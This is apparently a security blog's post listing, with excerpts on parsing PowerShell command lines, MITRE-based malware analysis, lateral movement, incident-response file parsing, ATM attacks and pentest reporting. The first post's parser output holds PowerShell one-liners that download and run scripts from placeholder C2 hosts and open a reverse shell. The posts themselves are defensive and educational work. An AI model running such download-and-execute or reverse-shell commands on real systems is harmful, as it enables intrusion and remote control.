PowerShell cmdline parsing/tokenization

This is just a quick blog post, mostly a memo-to-self so I don't forget how to parse PowerShell command lines with C#. Of course, as usual, I found a ready-made solution when I already had a dirty working version:

The fun part is that, like @FuzzySec often says, it runs on OSX as well :) Some example output:

[Command] powershell
[CommandArgument] iex
[GroupStart] (
[Command] New-Object
[CommandArgument] Net.WebClient
[GroupEnd] )
[Operator] .
[Member] DownloadString
[GroupStart] (
[String] 'http://<yourwebserver>/Invoke-PowerShellTcp.ps1'
[GroupEnd] )
[StatementSeparator] ;
[Command] Invoke-PowerShellTcp
[CommandParameter] -Reverse
[CommandParameter] -IPAddress
[CommandArgument] [IP]
[CommandParameter] -Port
[CommandArgument] [PortNo.]
=============================
[Command] powershell
[CommandParameter] -nop
[CommandParameter] -exec
[CommandArgument] bypass
[CommandParameter] -c
[String] "IEX (New-Object Net.WebClient).DownloadString('http://www.c2server.co.uk/script.ps1');"
=============================
[Command] powershell
[CommandParameter] -exec
[CommandArgument] bypass
[CommandParameter] -c
[String] "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://c2server.co.uk/script.ps1')|iex"
=============================
[Command] powershell.exe
[CommandParameter] -Verb
[CommandArgument] runAs
[CommandParameter] -ArgumentList
[String] "-File C:\Scripts\MyScript.ps1"
=============================
[Command] powershell.exe
[CommandParameter] -File
[String] "C:\Temp\YourScript.ps1"
[CommandParameter] -Noexit
=============================

Analyzing Pipedream / Incontroller with MITRE/STIX

This blog post is intended as further practice with MITRE data, as well as a way to understand some OT attack techniques implemented by OT malware. For this we are going to look at Pipedream (researched by Dragos) and Incontroller (researched by Mandiant). No, these are not two different malware strains, but the same one; the two firms happened to research the same malware independently and name it differently, or so I assume.

I chose OT malware because I was curious, but it could just as well have been your run-of-the-mill other type of malware. When malware or an attack hits the news, a lot of people want to know: What is it? Who is behind it? What can we do against it? Would we be resilient against it? And many more questions of a similar sentiment. These questions can be answered in a variety of ways, but I thought, let me answer them by using the MITRE data. You can read about my first baby steps into working with MITRE data in the previous blog about MITRE, STIX, Pandas, etc.

In this blog post we will dig deeper and actually attempt to answer some of those questions: if we had to deal with this malware, what actions could or should we take to be resilient?

  1. Overview of Pipedream / Incontroller
  2. Our questions
  3. Our answers
    1. What does it do?
    2. Which security controls are relevant?
    3. Do we have logging for its actions?
  4. Conclusion
  5. References

Oh, and as usual you can skip to the Jupyter notebook here if you prefer a more hands-on approach and less reading.
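To give a feel for the kind of questions you can ask the MITRE data, here is a minimal, stdlib-only sketch (no stix2 or pandas) that resolves "mitigates" relationships in a STIX bundle. The bundle below is a hand-made toy example; the object names and IDs are made up, but the real ATT&CK for ICS dataset has the same overall shape.

```python
import json

# Toy STIX 2.x bundle; the objects and IDs are hypothetical stand-ins
# for the real MITRE ATT&CK for ICS data.
bundle_json = """
{
  "type": "bundle",
  "id": "bundle--00000000-0000-0000-0000-000000000000",
  "objects": [
    {"type": "attack-pattern", "id": "attack-pattern--1", "name": "Denial of Control"},
    {"type": "course-of-action", "id": "course-of-action--1", "name": "Network Segmentation"},
    {"type": "relationship", "id": "relationship--1",
     "relationship_type": "mitigates",
     "source_ref": "course-of-action--1", "target_ref": "attack-pattern--1"}
  ]
}
"""

def mitigations_for(bundle: dict) -> list[tuple[str, str]]:
    """Resolve 'mitigates' relationships into (mitigation, technique) name pairs."""
    by_id = {obj["id"]: obj for obj in bundle["objects"]}
    pairs = []
    for obj in bundle["objects"]:
        if obj["type"] == "relationship" and obj["relationship_type"] == "mitigates":
            pairs.append((by_id[obj["source_ref"]]["name"],
                          by_id[obj["target_ref"]]["name"]))
    return pairs

bundle = json.loads(bundle_json)
print(mitigations_for(bundle))
```

The same lookup pattern (index every object by `id`, then walk the relationship objects) scales to the full ATT&CK bundle, which is just a much larger list of objects.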

Continue reading “Analyzing Pipedream / Incontroller with MITRE/STIX”

Lateral movement: A conceptual overview

I’ve often been in the situation of explaining lateral movement to people who do not work in the offensive security field on a daily basis, or who have a different level of technical understanding. A lot of the time I’ve not really talked about the ways in which lateral movement is performed; instead I’ve taken a step back and first talked about the ‘freedom of movement’ that an attacker obtains when they first enter your environment.

This small nuance helps a lot of people shift their mindset from ‘I’m not an attacker, I don’t know how they move laterally, that sounds technical’ to a more curious ‘How do you mean, freedom? Do you mean what the attacker can do to move around in our environment?’. Depending on their background & knowledge, they’ll then be able to name some ways in which they think an attacker has ‘the freedom to move’. Now don’t get me wrong, I’m not advocating changing the terminology, but helping people shift their frame of reference goes a long way.

I think it would help a lot of those people to look at lateral movement from a conceptual point of view, instead of trying to understand all the techniques and ways in which lateral movement is achieved. Thus, here you are reading my attempt at explaining lateral movement in a conceptual manner. The goal is to hopefully enable more people to learn about how they can restructure or design their environments to be more resilient against lateral movement.

Simplified view of lateral movement

In its most basic form, the above image is what many people envision when we talk about lateral movement or network propagation. This, however, is open to many interpretations. It also feels outdated: we now have the cloud, and the cloud isn’t a network, right? Before we jump to conclusions, let’s first generalize lateral movement into the different areas that are always at play when somebody moves inside your environment. This blog post will explain the concepts of:

  • Network
  • Identity
  • Functionality

After which, real-world examples will be given of the (ab)use of these concepts to achieve lateral movement. The combination of these three concepts allows attackers to move within networks.

  1. The concepts
    1. Network
    2. Identity
    3. Functionality
  2. Real world examples
    1. Remote Desktop
    2. File transfer protocol
    3. Application servers
  3. Conclusion
Continue reading “Lateral movement: A conceptual overview”

Opinion: Time is crucial when building secure components or infrastructures

Like the title implies, this time I’m not talking about being able to ‘operate at the speed of an attacker’ as defenders. I’m talking about: do we sufficiently account for the time factor when we design & build secure components or environments? It seems that when we build, we forget about security as soon as we start to run out of time, even if we talk about security by design. Of course this isn’t universally applicable, but I’ve seen it happen at various companies and thought, well, let me write it down; maybe it helps to order my thoughts.

When projects are defined and a time estimate is provided, it seems not to include the time required to do things securely, unless we explicitly make security a requirement. As you might expect, security is not made an explicit requirement for a lot of projects.
The funny aspect is that the time we (consciously) did not invest at the beginning seems to bite us in the behind later on. Yet we don’t seem to be bothered by a painful behind, or even by missing half of our behind.

Maybe all of this is just human nature? We know that smoking is bad, but since the effects are not immediately visible we are unable to oversee the consequences. Same goes for not doing security from the start, we know the consequences can be bad, but we are unable to oversee how bad exactly.

You might be wondering about specific examples to substantiate the above claim. Let’s have a look at some examples that, in my opinion, are purely a matter of time and not so much of resources or money. Yes, you could convert all time to resources & money, but in my simple mind, sometimes just allowing activities to take longer will save you a lot of time & money later on. The interesting aspect is that when I used to be on the offensive side it never crossed my mind that one of the causes might be time related; I always assumed that more resources & money would just fix it.

TL;DR: After writing this post I realise that we just can’t seem to find consensus on what the bare minimum security level is that should always be implemented. This eventually results in people forgetting about security, or in security absolutism / perfectionism, with the end result that we’d rather not implement security by default than run the risk of missing our (often) self-imposed deadline.

Do read on if you are curious about the examples that led me to believe that time is crucial if we want to change our behaviour towards more secure-by-default approaches.

Continue reading “Opinion: Time is crucial when building secure components or infrastructures”

OBS: Presentation & slides side by side

This is just a quick blog on how you can stitch together a video file of a presentation and the corresponding talk slides using Open Broadcaster Software (OBS). The first time I did this I had to fiddle around a bit, so this also serves as a mini tutorial for future me. Feel free to leave tips & tricks in the comments.

Continue reading “OBS: Presentation & slides side by side”

Parsing atop files with python dissect.cstruct

As you’ve probably read, Fox-IT released their incident response framework called dissect, but before that they released the cstruct part of their framework. Ever since they released it publicly I’ve been wanting to find an excuse to play with it on public projects. I witnessed the birth of cstruct back when I was still working at Fox-IT and am very happy to see it has all finally been made public; it sure has evolved since I had a look at the very first version! Special thanks to Erik Schamper (@Schamperr) for answering late night questions about some of the inner workings of dissect.cstruct.

This is one of those things you can encounter during an incident response assignment, and for which life is a bit easier if you can just parse the binary file format with Python. During incident response you never know exactly in which format you want to receive the data for analysis, or what you are looking for, so it really helps to work with tools that can be rapidly adjusted. Python is an ideal environment to achieve this. An added benefit of parsing the structures ourselves with Python is that we can avoid string parsing, and thus avoid confusion and mistakes.

The atop tool is a performance monitoring tool that can write the output into a binary file format. The creator explains it way better than I do:

Atop is an ASCII full-screen performance monitor for Linux that is capable of reporting the activity of all processes (even if processes have finished during the interval), daily logging of system and process activity for long-term analysis, highlighting overloaded system resources by using colors, etc. At regular intervals, it shows system-level activity related to the CPU, memory, swap, disks (including LVM) and network layers, and for every process (and thread) it shows e.g. the CPU utilization, memory growth, disk utilization, priority, username, state, and exit code.
In combination with the optional kernel module netatop, it even shows network activity per process/thread.

The atop tool website

As you can imagine, having the above information is a nice treasure trove to find during an incident response, even if it is based on a pre-set interval. At the very minimum, you can extract process executions with their respective command lines and the corresponding timestamps.

Since this is an open source tool, we can just look at the structure definitions in C and lift them right into cstruct to start parsing. The atop tool itself offers the ability to parse written binary files as well, for example using this command:

atop -PPRG -r <file>

For the rest of this blog entry we will look at parsing atop binary log files with Python and dissect.cstruct, mostly intended as a walkthrough of the thought process.
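The underlying idea of mapping C structures onto bytes can be sketched with nothing but Python's stdlib `struct` module (dissect.cstruct goes further and lets you paste the C definitions verbatim). The record layout below is hypothetical and far simpler than the real atop structures; it only illustrates the pattern:

```python
import struct

# Hypothetical, simplified record layout for illustration only; the real
# atop structures are defined in its C headers and are far more elaborate.
# Roughly: struct rawrecord { unsigned int curtime; unsigned short nprocs; char cmd[16]; };
RECORD = struct.Struct("<IH16s")  # little-endian: uint32, uint16, 16-byte char array

def parse_record(data: bytes) -> dict:
    """Unpack one fixed-size record and strip the NUL padding from the command."""
    curtime, nprocs, cmd = RECORD.unpack_from(data)
    return {
        "curtime": curtime,
        "nprocs": nprocs,
        "cmd": cmd.split(b"\x00", 1)[0].decode(),
    }

# Round-trip a fabricated record to show the parsing direction.
raw = RECORD.pack(1650000000, 2, b"sshd")
print(parse_record(raw))
```

With dissect.cstruct the `RECORD` definition would instead be the C struct text itself, which is exactly why it pairs so well with open source formats like atop's.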

You can also skip reading the rest of this blog entry and jump to the code if you are impatient or familiar with similar thought processes.

Continue reading “Parsing atop files with python dissect.cstruct”

Baby steps into MITRE Stix/Taxii, Pandas, Graphs & Jupyter notebooks

So there I was preparing a presentation with some pretty pictures and then I thought…after I give this presentation: How will the audience play with the data and see for themselves how these pictures were brought into existence?

Finally I had a nice use case to play around with some kind of environment for rapidly prototyping data visualization, in a manner that allows for repeatable further exploration and analysis, hopefully with the ability to draw some kind of conclusion. For now I settled on just learning the basics and getting used to all these nifty tools that really make these types of jobs a breeze. You can skip this post and go directly to the Jupyter notebook if you just want to dive into the data/visualizations. The rest of the blog post is about the choices made and technologies used, mostly intended as a future reference for myself.

MITRE ICS data as a visual graph of techniques (red), mitigations (green), data components (blue)
Continue reading “Baby steps into MITRE Stix/Taxii, Pandas, Graphs & Jupyter notebooks”

Lockbit’s bounty: consequences matter

Apparently sometimes you only grasp something when it is really in your face, even though you are continuously surrounded by it. The following tweet made me realize that real consequences to vulnerabilities matter a lot! Oh, and this blog is mostly some ponderings and opinions, for the people wondering if they should read it or not :)

Announcement that the first bounty was paid by a ransomware group (Lockbit) for a bug in their encryption implementation

What this tweet made me realize is that for Lockbit the consequence of the bug is directly tied to their income. No indirect damages, no additional bugs, no excuses. If the bug isn’t fixed, people don’t need to pay them. How many types of companies and bugs do we know that have the same one-to-one relation between a bug and a direct consequence for survival?

This made me wonder whether we are approaching the rating & fixing of vulnerabilities within regular companies in a less than optimal manner. It would be interesting if we could learn something from groups that operate on continuous innovation and under the severe threat of real life consequences like jail time or worse. In this blog I’ll talk about:

  • Analysing the Lockbit bug bounty
  • Applying the lessons learned to regular companies

TL;DR: Bloodhound showed us that graphs are powerful for analysing and eliminating paths towards domain admin privileges. The same concept should be applied to vulnerabilities company-wide. Regular companies don’t have the same severe consequences that ransomware groups have; should they?

Continue reading “Lockbit’s bounty: consequences matter”

Generating network connection information for experimentation purposes

In one of my last blogs I talked about visualizing firewall data for the purpose of analyzing the configuration and potentially identifying security issues. As usual you can skip directly to the tool on my github, or keep on reading.

I wanted to continue playing with this approach to see how it could be improved from a fairly static tool to a more graph-database-like approach. However, it turns out that it is somewhat difficult to obtain public firewall configuration files to play with. This is a problem similar to the one people doing machine learning in cybersecurity face, where obtaining datasets is still a bit of a challenge.

I decided to write a tool to generate this connection information and, at the same time, play with as well as learn some things which I usually never bother with during the development of proof-of-concept projects. So this time I decided to actually document my code, use type annotations, write some unit tests using pytest, and finally figure out how argparse sub-commands work.

The tool intends to eventually offer the following options, but for now it only offers the plain option:

python generator_cli.py
usage: generator_cli.py [-h] [--debug] [--verbose] [--config CONFIG] [--mode {inner,outer,all}] {plain,time,apps,full} ...

Generate network connection with a varying level of metadata

options:
  -h, --help            show this help message and exit
  --debug               set debug level
  --verbose             set informational level
  --config CONFIG       Configuration file
  --mode {inner,outer,all}
                        Generate only inner vlan, outer vlan or all connections

Available sub-commands:
  {plain,time,apps,full}
                        Generate connection dataset with different levels of metadata
    plain               Only ip,src,ports
    time                Adds timestamp within desired range
    apps                Adds application details per connection
    full                Generates connections with timestamps & application information

Thanks for giving this a try! --DiabloHorn

The plain option generates the bare minimum of connection information:

{'srchost': '219.64.120.76', 'dsthost': '68.206.89.177', 'srcport': 64878, 'dstport': 3389}
{'srchost': '219.64.120.13', 'dsthost': '68.206.89.162', 'srcport': 63219, 'dstport': 3389}
{'srchost': '92.9.15.58', 'dsthost': '118.220.234.59', 'srcport': 49842, 'dstport': 3389}
{'srchost': '92.9.15.62', 'dsthost': '118.220.234.216', 'srcport': 57969, 'dstport': 445}
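For illustration, here is a stdlib-only sketch of how such "plain" records could be generated. The networks, port choices, field names and seed are arbitrary choices mirroring the output above; this is not the actual generator_cli.py implementation.

```python
import ipaddress
import random

def generate_plain(src_net: str, dst_net: str, dst_ports: list[int],
                   count: int, seed: int = 0) -> list[dict]:
    """Generate 'count' connection records between two illustrative networks."""
    rng = random.Random(seed)  # seeded for reproducible output
    src = ipaddress.ip_network(src_net)
    dst = ipaddress.ip_network(dst_net)
    records = []
    for _ in range(count):
        records.append({
            # skip the network and broadcast addresses
            "srchost": str(src[rng.randrange(1, src.num_addresses - 1)]),
            "dsthost": str(dst[rng.randrange(1, dst.num_addresses - 1)]),
            "srcport": rng.randrange(49152, 65536),  # ephemeral source port
            "dstport": rng.choice(dst_ports),        # a plausible service port
        })
    return records

for record in generate_plain("219.64.120.0/24", "68.206.89.0/24", [445, 3389], 4):
    print(record)
```

Indexing an `ip_network` object directly (`src[i]`) is what keeps this short: it hands back the i-th host address without any manual integer-to-octet conversion.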

The main concept of the tool is that you can define VLAN names and some options and based on that information inner and outer connections for those VLANs are then generated. The --mode parameter controls which type of connections it will generate. The inner mode will only generate connections within the VLAN, the outer mode will generate only connections from the VLAN to other VLANs and the all mode will generate both.

I hope, but don’t promise, to eventually implement the other subcommands time for the generation of connection info within a defined time range (each connection being timestamped) and apps to generate connection info linked to applications like chrome, spotify, etc.

The following set of commands illustrates how you can use this tool to generate pretty pictures with yEd:

python generator_cli.py plain | jq '[.srchost,.dsthost,.dstport] | join(",")'

This will output something along the lines of the following, which, after converting to an Excel document, you can import into yEd:

139.75.237.238,127.17.254.69,389
139.75.237.123,127.17.254.147,389
139.75.237.243,127.17.254.192,80
139.75.237.100,127.17.254.149,389
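The same flattening that the jq filter performs can be sketched in a few lines of Python; the records below are copied from the example output above, and the field names match the tool's output.

```python
# Flatten each generated record into a 'srchost,dsthost,dstport' line,
# the same shape the jq one-liner produces for yEd import.
records = [
    {"srchost": "139.75.237.238", "dsthost": "127.17.254.69", "srcport": 50000, "dstport": 389},
    {"srchost": "139.75.237.243", "dsthost": "127.17.254.192", "srcport": 50001, "dstport": 80},
]

lines = [f'{r["srchost"]},{r["dsthost"]},{r["dstport"]}' for r in records]
print("\n".join(lines))
```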

The featured image of this blog shows all of the generated nodes; the following image provides details of one of those generated collections of nodes:

Details of a single collection of generated nodes

Three ways to hack an ATM

Please note: This is a mirrored post from a blog I wrote for one of my employers. The goal is to avoid the content being lost, since corporate websites are restructured and changed frequently.

Keyboard attacks, disk attacks and network attacks

Hacking ATMs, also known as Jackpotting, is an activity that speaks to our imagination, conjuring up visions of ATMs that spit out money into the street for everyone to pick up. The three attacks that we describe in this article are the result and recurring theme of numerous assessments that we have performed over the years for many of our customers. These are the (digital) attacks that we believe matter most and that require a serious look from anyone protecting an ATM.

Please note that hacking ATMs is illegal. Fox-IT’s security experts have performed these attacks with the permission of the ATMs’ owners.

Continue reading “Three ways to hack an ATM”

Writing a zero findings pentest report

Recently I came across a tweet by @CristiVlad25 asking what you should write in a pentest report when there are no findings. I did a quick quote tweet with the first thoughts that came to mind:

Which got me thinking: why not write a bit more about this situation? There are multiple resources on writing pentest reports that all highlight different aspects of the general structure and approach of a pentest report, so I won’t get into that; you can find multiple references, including sample reports, at the end of this blog post.

Instead I want to focus only on the situation where you have 0, zero, nothing, nil findings. What do you do then?

Continue reading “Writing a zero findings pentest report”

Firewall analysis: A portable graph based approach

Sometimes you are asked to perform a firewall analysis to determine whether the configuration can be improved upon, to reduce an attacker’s ability to move laterally through the network, or to identify attack paths that have been missed due to the many firewall changes.

You can perform this analysis using many tools and approaches, ranging from manually reviewing every rule, to using an automated tool like nipper, to my personal favourite: a graph-based approach (which also works for log data). The reference section of this post contains papers that go in-depth on this approach.

With the graph-based approach you can visualize the ruleset to identify nodes that have a lot of incoming and/or outgoing connections, but you can also trace paths through the network to understand if they should be removed. When combined with bloodhound data and neo4j you can query the data and have the graph database answer questions like “Is there a path from the workstation to the finance server?”. This requires a fair amount of knowledge, as well as supporting software to get it all set up, which in turn complicates transferring that knowledge to network engineers or firewall administrators so they can perform these analyses themselves and better understand whether their changes impacted the security of the network.

The bottom line for me with these types of analyses is: how can I transfer security knowledge in an easy and understandable manner to the people that have to deal with maintaining the environment on a daily basis?
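The core of the graph idea fits in a few lines of plain Python: model allowed firewall flows as a directed graph and ask whether a path exists between two hosts. A real analysis would use neo4j/BloodHound on actual rulesets; the rules and host names below are made up for illustration.

```python
from collections import deque

# Each tuple is an allowed flow (source, destination); hypothetical example rules.
rules = [
    ("workstation", "jumphost"),
    ("jumphost", "finance-server"),
    ("workstation", "printer"),
]

def find_path(rules, src, dst):
    """Breadth-first search for a path of allowed flows from src to dst."""
    graph = {}
    for a, b in rules:
        graph.setdefault(a, []).append(b)
    queue = deque([[src]])
    seen = {src}
    while queue:
        path = queue.popleft()
        if path[-1] == dst:
            return path
        for nxt in graph.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None  # no chain of allowed flows connects src to dst

print(find_path(rules, "workstation", "finance-server"))
```

A returned path is exactly the kind of answer the "workstation to finance server" question asks for, and because it is just a list of hops it is easy to hand to a firewall administrator as evidence.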

Continue reading “Firewall analysis: A portable graph based approach”

More doing, less cyber

A nice and rainy Sunday evening, at least from the perspective of the couch that I was on about 10 minutes ago. I have now gotten up and walked to my laptop to rant: rant about cyber, and rant about the many excuses that companies use to not become more resilient against attacks. Funnily enough, those excuses have now become the excuses of the cyber people as well. This post won’t really solve anything; it will however allow me to refill my glass of wine and bring me the warm fuzzy feeling of having shared my opinion online, without any goal or intended audience.

If you just want to have a drink (non-alcoholic included) and read some chaotic ranting, do continue. I hope you get at the very least a laugh out of it, since your pool of tears has probably dried up a long time ago if you work in cyber security. Oh, and if you strongly disagree with this post, or it gets you angry or frustrated, just remember that I wrote this to relax, enjoy some wine, rant, and then on Monday start all over again with attempting to make the reality in which I operate just a little bit more resilient, if possible.

Continue reading “More doing, less cyber”

CSAW 2021, binary ninja & a haystack

Getting to know the cloud version of Binary Ninja by reversing the CSAW 2021 haystack challenge.

This is a quick post on our adventures with Binary Ninja and the haySTACK challenge from this year’s CSAW 2021. On a lost evening @donnymaasland & @nebukatnetsar were playing around and said: well, this looks fun, let’s try it out with Binary Ninja.

I had totally forgotten about Binary Ninja, but boy oh boy do I still like it! Not that I forgot because I use other tools, mostly I forgot because I hardly do technical stuff nowadays. If you are not familiar with it, it is a reversing tool / framework which has a rich API if you use the native client.

The binja cloud version

The nice part is that it also includes what they call “High Level IL”, which is basically a decompiler that converts the assembly into a pretty readable, C-like representation. The even more awesome part is that collaborating on the same binary is a breeze. You can work with multiple people in the same binary without needing to set anything up yourself; just make sure everyone has an account on https://cloud.binary.ninja

Let’s get started with the challenge, or more specifically, getting to know the cloud version of Binary Ninja by playing around with this challenge. We’ll cover things like:

  • Renaming variables
  • Creating & applying enums
  • Creating & applying structs
  • Inviting others to collaborate
  • Understanding the thought process
Continue reading “CSAW 2021, binary ninja & a haystack”

Pentesting: What I should have done

If I had the luxury of talking to my past self, these are the things I wished I had done differently during the years I performed pentesting. Some of these I eventually learned before I stopped pentesting; others, well, let’s just say they are much more recent. If I think of more items I’ll attempt to update the blog.

If you are a pentester and you are reading this, I hope you can benefit from them. Just make sure you evaluate if they are applicable to your situation and adjust them as required. If you are in a rush, here is the list, details can be found in the rest of this article:

  • Don’t be afraid of talking to clients
  • Always ask for equivalent access
  • Avoid blackbox tests
  • Write the report while you pentest
  • Images, images & images
  • Provide detection advice & POCs
  • Provide reproducible POCs for your attacks (security regression tests)
  • Provide scripts to fix the issue (when possible)
  • Publish more
  • Grasp the bigger picture
  • Include what you didn’t do
  • Don’t be afraid to say something was good

I’ve also included some crazy fantasies of mine, about which I’ll always wonder whether they would’ve made a difference.

  • Re-use reports and label them as such
  • Provide the report upfront
Continue reading “Pentesting: What I should have done”